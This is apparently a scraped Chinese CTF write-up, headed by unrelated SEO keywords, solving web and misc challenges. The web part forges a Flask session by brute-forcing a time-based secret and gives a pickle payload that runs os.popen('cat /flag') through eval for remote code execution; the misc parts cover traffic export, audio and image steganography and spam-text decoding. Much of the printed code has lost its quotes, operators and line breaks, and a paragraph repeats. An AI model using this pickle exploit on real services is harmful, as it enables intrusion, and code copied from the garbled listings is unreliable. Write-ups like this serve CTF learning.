企业网站优化案例,点赞排行 wordpress,淘宝网站建设类别,wordpress制作主题调用编辑器web
What the cow say?
进入容器有个输入框#xff0c;尝试ssti、命令执行、代码执行等#xff0c;最后发现可使用反引号执行命令#xff1b; 输入 nl app.py 可查看源代码#xff0c;有功能具体实现、过滤之类的#xff1b;
flag在 /flag_is_here home/flag_c0w54y 中…web
What the cow say?
进入容器有个输入框尝试ssti、命令执行、代码执行等最后发现可使用反引号执行命令 输入 nl app.py 可查看源代码有功能具体实现、过滤之类的
flag在 /flag_is_here home/flag_c0w54y 中执行命令获取flag myflask
访问题目地址获得app.py源代码
# app.py
import pickle
import base64
from flask import Flask, session, request, send_file
from datetime import datetime
from pytz import timezonecurrentDateAndTime datetime.now(timezone(Asia/Shanghai))
currentTime currentDateAndTime.strftime(%H%M%S)app Flask(__name__)
# Tips: Try to crack this first ↓
app.config[SECRET_KEY] currentTime
print(currentTime)app.route(/)
def index():session[username] guestreturn send_file(app.py)app.route(/flag, methods[GET, POST])
def flag():if not session:return There is no session available in your client :(if request.method GET:return You are {} now.format(session[username])# For POST requests from adminif session[username] admin:pickle_database64.b64decode(request.form.get(pickle_data))# Tips: Here try to trigger RCEuserdatapickle.loads(pickle_data)return userdataelse:return Access Deniedif __name____main__:app.run(debugTrue, host0.0.0.0)分析源码/ 路由可下载app.py文件/flag 路由会判断有无session有session则输入对应用户名如果session的用户名为admin会对post传入的数据进行pickle反序列化明显存在pickle反序列化漏洞
首先需要进行session伪造密钥由时间的时分秒组合而成如在10:10:10时间获取的session则密钥为101010写脚本对获取session的1分钟时间爆破即可
开启环境访问 / 路由并记录时间如13:25访问/flag此时为guest用户 python版本为3使用flask_session_cookie_manager3.py伪造session写脚本爆破session密钥记录的时间为13:25爆破132500-132559即可
# 1.py
import osfor k in range(0, 60):if k 10:secret 13250 str(k)else:secret 1325 str(k)c eyJ1c2VybmFtZSI6Imd1ZXN0In0.ZcDf2A.gSn2YomfAAl0qozjgrBDN5194Bcprint(os.popen(fpython flask_session_cookie_manager3.py decode -s {secret} -c {c}).read(), end)print(***** secret)伪造session并修改网站session此时为admin用户可以进行pickle反序列化了 构造payload
import pickle
import base64class Flag(object):def __reduce__(self):return (eval, (__import__(os).popen(cat /flag).read(),))flag Flag()
print(base64.b64encode(pickle.dumps(flag)))# payload
# pickle_datagASVRgAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhbJSTlIwqX19pbXBvcnRfXygnb3MnKS5wb3BlbignY2F0IC9mbGFnJykucmVhZCgplIWUUpQu
提交payload进行pickle反序列化触发rce获取flag misc
ek1ng_want_girlfriend
流量分析使用wireshark打开流量包过滤http发现有一张图片ek1ng.jpg 选中请求图片的响应(241 HTTP/1.0 200 OK)选择 文件 导出对象 http导出ek1ng.jpg图片保存 打开导出的图片发现flag在图片下方 龙之舞
下载附件deepsound_of_dragon_dance.wav根据附件名猜测deepsound隐写使用工具打开发现需要密码 将附件放入Audacity查看频谱图发现隐写数据 需要上下翻转看内容为KEY : 5H8w1nlWCX3hQLG 使用5H8w1nlWCX3hQLG 作为deepsound密码成功分离出隐藏的压缩包 压缩包内是一张gif动图在第55、121、153、232帧处分别有一张四分之一的二维码图片 将四张二维码碎片拼接并修复后扫描获得flag
ezWord
下载附件是一个word文档将后缀改为zip解压发现word/media目录下有四个文件 结合题目描述通过破译图片的水印来解开文档里的秘密吧可知两张图片为盲水印使用blindwatermark 工具可提取盲水印T1hi3sI4sKey根据 恭喜.txt 中提示为压缩包密码
# 盲水印提取
python bwmforpy3.py decode 100191209_p0.jpg image1.png password.png# blindwatermark工具下载
https://github.com/chishaxie/BlindWaterMark 使用 T1hi3sI4sKey 密码解压secret.zip在secret.txt中有如下一段英文
Dear E-Commerce professional ; This letter was specially
selected to be sent to you . We will comply with all
removal requests ! This mail is being sent in compliance
with Senate bill 1620 ; Title 3 ; Section 308 ! This
is not a get rich scheme ! Why work for somebody else
when you can become rich in 27 MONTHS . Have you ever
noticed more people than ever are surfing the web and
more people than ever are surfing the web . Well, now
is your chance to capitalize on this ! WE will help
YOU use credit cards on your website plus turn your
business into an E-BUSINESS . You are guaranteed to
succeed because we take all the risk ! But dont believe
us . Ms Simpson who resides in Maine tried us and says
Ive been poor and Ive been rich - rich is better
. We are a BBB member in good standing ! We urge you
to contact us today for your own future financial well-being
. Sign up a friend and youll get a discount of 50%
. Thank-you for your serious consideration of our offer
! Dear Friend ; This letter was specially selected
to be sent to you ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2316 ; Title 8 , Section 301 ! Do NOT confuse
us with Internet scam artists . Why work for somebody
else when you can become rich as few as 24 WEEKS !
Have you ever noticed more people than ever are surfing
the web plus how many people you know are on the Internet
. Well, now is your chance to capitalize on this .
We will help you decrease perceived waiting time by
200% and turn your business into an E-BUSINESS . You
are guaranteed to succeed because we take all the risk
. But dont believe us . Mrs Simpson of Illinois tried
us and says Now Im rich many more things are possible
! We assure you that we operate within all applicable
laws ! Do not delay - order today . Sign up a friend
and your friend will be rich too . Warmest regards
! Dear Sir or Madam ; Especially for you - this hot
information . We will comply with all removal requests
! This mail is being sent in compliance with Senate
bill 1916 ; Title 2 , Section 301 ! THIS IS NOT MULTI-LEVEL
MARKETING ! Why work for somebody else when you can
become rich in 89 days . Have you ever noticed most
everyone has a cellphone plus most everyone has a cellphone
! Well, now is your chance to capitalize on this !
WE will help YOU sell more SELL MORE . You can begin
at absolutely no cost to you . But dont believe us
. Mr Jones of Minnesota tried us and says I was skeptical
but it worked for me ! We assure you that we operate
within all applicable laws ! We beseech you - act now
. Sign up a friend and youll get a discount of 90%
. Thanks . Dear Cybercitizen ; Your email address has
been submitted to us indicating your interest in our
newsletter . If you are not interested in our publications
and wish to be removed from our lists, simply do NOT
respond and ignore this mail ! This mail is being sent
in compliance with Senate bill 2016 , Title 2 , Section
304 . This is different than anything else youve seen
! Why work for somebody else when you can become rich
in 48 weeks ! Have you ever noticed more people than
ever are surfing the web plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU deliver goods right to the customers
doorstep turn your business into an E-BUSINESS .
You can begin at absolutely no cost to you . But dont
believe us . Ms Anderson who resides in New York tried
us and says My only problem now is where to park all
my cars ! We are a BBB member in good standing . If
not for you then for your LOVED ONES - act now ! Sign
up a friend and youll get a discount of 20% ! God
Bless . Dear Colleague , Your email address has been
submitted to us indicating your interest in our publication
. If you no longer wish to receive our publications
simply reply with a Subject: of REMOVE and you will
immediately be removed from our mailing list . This
mail is being sent in compliance with Senate bill 2416
, Title 9 ; Section 308 ! This is NOT unsolicited bulk
mail . Why work for somebody else when you can become
rich within 24 MONTHS ! Have you ever noticed most
everyone has a cellphone and people love convenience
. Well, now is your chance to capitalize on this !
We will help you decrease perceived waiting time by
190% and sell more ! The best thing about our system
is that it is absolutely risk free for you ! But dont
believe us . Mrs Anderson of Indiana tried us and says
Now Im rich, Rich, RICH . This offer is 100% legal
. So make yourself rich now by ordering immediately
. Sign up a friend and your friend will be rich too
. God Bless ! Dear Colleague ; We know you are interested
in receiving amazing information ! If you are not interested
in our publications and wish to be removed from our
lists, simply do NOT respond and ignore this mail !
This mail is being sent in compliance with Senate bill
1619 , Title 7 , Section 303 ! This is not multi-level
marketing . Why work for somebody else when you can
become rich within 37 days ! Have you ever noticed
nobody is getting any younger plus people love convenience
! Well, now is your chance to capitalize on this .
WE will help YOU decrease perceived waiting time by
140% plus deliver goods right to the customers doorstep
. You can begin at absolutely no cost to you . But
dont believe us ! Mrs Simpson of Illinois tried us
and says I was skeptical but it worked for me . We
are licensed to operate in all states ! Because the
Internet operates on Internet time you must make
a commitment soon ! Sign up a friend and you get half
off ! Thank-you for your serious consideration of our
offer . Dear Friend ; We know you are interested in
receiving amazing info ! We will comply with all removal
requests . This mail is being sent in compliance with
Senate bill 2716 , Title 5 , Section 303 ! This is
not a get rich scheme . Why work for somebody else
when you can become rich within 52 days ! Have you
ever noticed how many people you know are on the Internet
and the baby boomers are more demanding than their
parents ! Well, now is your chance to capitalize on
this . WE will help YOU decrease perceived waiting
time by 170% and turn your business into an E-BUSINESS
. You are guaranteed to succeed because we take all
the risk ! But dont believe us ! Mrs Anderson who
resides in Alabama tried us and says Now Im rich,
Rich, RICH ! We are a BBB member in good standing
. So make yourself rich now by ordering immediately
! Sign up a friend and you get half off ! Thanks .
Dear Salaryman ; Especially for you - this red-hot
news ! We will comply with all removal requests . This
mail is being sent in compliance with Senate bill 1618
, Title 4 , Section 308 . THIS IS NOT MULTI-LEVEL MARKETING
. Why work for somebody else when you can become rich
inside 27 days ! Have you ever noticed nearly every
commercial on television has a .com on in it nearly
every commercial on television has a .com on in it
! Well, now is your chance to capitalize on this !
WE will help YOU decrease perceived waiting time by
180% plus turn your business into an E-BUSINESS . You
can begin at absolutely no cost to you ! But dont
believe us ! Prof Ames who resides in Washington tried
us and says I was skeptical but it worked for me
. We assure you that we operate within all applicable
laws ! We implore you - act now . Sign up a friend
and youll get a discount of 10% . Thank-you for your
serious consideration of our offer ! Dear Friend ;
This letter was specially selected to be sent to you
! If you no longer wish to receive our publications
simply reply with a Subject: of REMOVE and you will
immediately be removed from our club ! This mail is
being sent in compliance with Senate bill 1622 , Title
7 ; Section 303 ! Do NOT confuse us with Internet scam
artists . Why work for somebody else when you can become
rich in 10 weeks ! Have you ever noticed people will
do almost anything to avoid mailing their bills people
love convenience ! Well, now is your chance to capitalize
on this . WE will help YOU turn your business into
an E-BUSINESS SELL MORE . You can begin at absolutely
no cost to you ! But dont believe us . Mr Ames of
Louisiana tried us and says Now Im rich, Rich, RICH
. We are licensed to operate in all states . We BESEECH
you - act now . Sign up a friend and youll get a discount
of 50% ! Thank-you for your serious consideration of
our offer .
搜索发现是 卡尔达诺栅格码Spam Mimic 在线网站spammimic - decode解密获得如下中文
籱籰籪籶籮粄簹籴籨粂籸籾籨籼簹籵籿籮籨籪籵簺籨籽籱簼籨籼籮籬类簼籽粆
中文转unicode获得16进制数 71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86 对比前几个16进制数发现与 hgame 的ascii码差9写脚本获取flag
a 71706a766e8439746882787e687c39757f6e686a753a687d713c687c6e6c7b3c7d86
flag
for i in range(0, len(a), 2):flag chr(int(a[i: i 2], 16) - 9)
print(flag) # hgame{0k_you_s0lve_al1_th3_secr3t}
